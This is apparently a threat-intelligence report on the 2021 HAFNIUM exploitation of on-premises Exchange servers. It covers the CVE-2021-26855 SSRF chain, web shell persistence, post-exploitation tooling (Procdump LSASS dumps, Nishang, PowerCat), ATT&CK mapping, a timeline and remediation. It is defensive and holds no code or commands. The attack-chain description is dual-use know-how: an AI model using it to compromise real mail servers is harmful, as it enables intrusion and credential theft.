HAFNIUM Exchange Server Exploitation Campaign

Executive Summary

The HAFNIUM Exchange Server exploitation campaign was a 2021 operation against on-premises Microsoft Exchange Server deployments. Microsoft disclosed on March 2, 2021 that it had detected multiple zero-day exploits used in targeted attacks, and it attributed the initial campaign activity to HAFNIUM. CISA warned that successful exploitation could allow unauthenticated attackers to execute code on vulnerable Exchange servers, gain persistent access, reach mailboxes and files, and compromise credentials or identity trust inside affected networks.

The campaign moved from targeted exploitation into a multi-actor incident after disclosure and patch release. The U.S. Department of Justice later stated that certain hacking groups exploited Exchange zero-days through January and February 2021, while other groups followed in early March after the vulnerabilities became public. By April 13, 2021, the FBI had completed a court-authorized operation to copy and remove one early hacking group’s remaining web shells from hundreds of U.S.-based Exchange servers.

Technical Analysis

The initial intrusion path centered on four Exchange Server vulnerabilities: CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065. CVE-2021-26855 allowed unauthenticated server-side request forgery against Exchange, enabling an attacker to send arbitrary HTTP requests and authenticate as the Exchange server. The other vulnerabilities supported remote code execution or arbitrary file write after authentication, which could follow from the SSRF bug or from stolen administrator credentials.

After gaining access, Microsoft observed HAFNIUM operators deploying web shells to compromised servers. Those web shells gave the operators a remote administration path that could persist even after the vulnerable server was patched, unless the web shell and any follow-on tooling were found and removed. Microsoft also described post-exploitation activity that included LSASS memory dumping with Procdump, use of 7-Zip to compress stolen data, Exchange PowerShell mailbox export activity, and use of PowerShell-based tools such as Nishang and PowerCat.

CISA framed the defensive problem as both server compromise and possible identity compromise. Its advisory warned that attackers could reach files and mailboxes on the Exchange server, credentials stored on the system, and potentially the Active Directory environment. That made simple patching insufficient for already-compromised environments: responders also needed to search for web shells, collect forensic artifacts, assess credential exposure, and review identity trust.

Attack Chain

Stage 1: Internet-Facing Exchange Discovery

Attackers identified exposed on-premises Exchange Server systems. The campaign did not affect Exchange Online or Microsoft 365 cloud email services according to Microsoft and CISA guidance.

Stage 2: Zero-Day Exploitation

Operators exploited CVE-2021-26855 to reach Exchange as the server and used related vulnerabilities to write files or execute code after authentication.

Stage 3: Web Shell Placement

The operators placed web shells on compromised servers. The web shells allowed continued remote administration of the server after the initial exploitation step.

Stage 4: Post-Exploitation Activity

Microsoft reported activity consistent with credential access, mailbox export, compressed data staging, and reverse-shell tooling. CISA warned that attackers could gain access to files, mailboxes, credentials, and identity infrastructure.

Stage 5: Follow-On Opportunistic Exploitation

After public disclosure and patch release, other groups also exploited the same vulnerability set. This follow-on activity moved the operational response beyond the initially attributed HAFNIUM activity.

Stage 6: Public-Private Remediation

Microsoft released patches, detection scripts, mitigation tooling, and indicators. CISA published advisory guidance, and the Justice Department later removed remaining web shells from hundreds of U.S.-based servers under court authorization.

MITRE ATT&CK Mapping

Initial Access

T1190 - Exploit Public-Facing Application: The campaign used vulnerabilities in internet-facing on-premises Exchange Server services to gain access.

Persistence

T1505.003 - Server Software Component: Web Shell: Web shells were deployed to provide continued remote access to compromised Exchange servers.

Execution

T1059.001 - Command and Scripting Interpreter: PowerShell: Microsoft described Exchange PowerShell snap-ins and PowerShell-based tooling during post-exploitation.

Collection

T1005 - Data from Local System: Source reporting described mailbox export, file access, offline address book access, and credential exposure risks on compromised servers.

Timeline

2021-01-01 — Exploitation Window Begins

The Justice Department later stated that certain hacking groups exploited Microsoft Exchange Server zero-days through January and February 2021.

2021-03-02 — Microsoft Discloses Exchange Zero-Day Exploitation

Microsoft disclosed attacks against on-premises Exchange Server, attributed the initial campaign activity to HAFNIUM, and released out-of-band security updates.

2021-03-03 — CISA Publishes AA21-062A

CISA published mitigation guidance for Exchange Server exploitation, including vulnerability details, response steps, and indicators of compromise.

2021-03-05 — Microsoft Reports Multiple Actors

Microsoft updated its guidance to state that multiple malicious actors were taking advantage of unpatched systems beyond the initially reported HAFNIUM activity.

2021-03-16 — Microsoft Releases Mitigation Tooling

Microsoft released an Exchange On-Premises Mitigation Tool to help organizations apply updates and perform detection steps where dedicated security teams were not available.

2021-04-13 — Justice Department Announces Web Shell Removal

The Justice Department announced a court-authorized FBI operation to copy and remove one early hacking group’s remaining web shells from hundreds of vulnerable U.S.-based Exchange servers.

2021-07-19 — U.S. Government Attribution Update

CISA updated AA21-062A to state that the U.S. Government attributed the activity to malicious cyber actors affiliated with the People’s Republic of China Ministry of State Security.

Remediation & Mitigation

Defenders needed to patch affected on-premises Exchange Server versions, but patching alone did not remove existing web shells or other post-exploitation artifacts. CISA and Microsoft directed organizations to inspect Exchange logs, search expected web paths for unexpected ASPX files, collect forensic artifacts, and look for evidence of credential, mailbox, and identity-system compromise.

Organizations with exposed Exchange servers should treat confirmed exploitation as an incident-response event. Practical steps include applying supported Exchange security updates, isolating vulnerable servers when patching cannot occur immediately, removing web shells, rotating credentials that may have been exposed, reviewing mailbox export activity, and checking for unauthorized changes in Active Directory and Exchange configuration.

The campaign also reinforced an operational lesson for internet-facing collaboration systems. Externally reachable email infrastructure needs rapid patch paths, asset inventory, centralized logging, and tested procedures for hunting web shells and credential access after a server-side exploit is disclosed.

Sources & References

• CISA: Mitigate Microsoft Exchange Server Vulnerabilities — CISA, 2021-03-03
• Microsoft Security: HAFNIUM targeting Exchange Servers with 0-day exploits — Microsoft Security, 2021-03-02
• U.S. Department of Justice: Justice Department Announces Court-Authorized Effort to Disrupt Exploitation of Microsoft Exchange Server Vulnerabilities — U.S. Department of Justice, 2021-04-13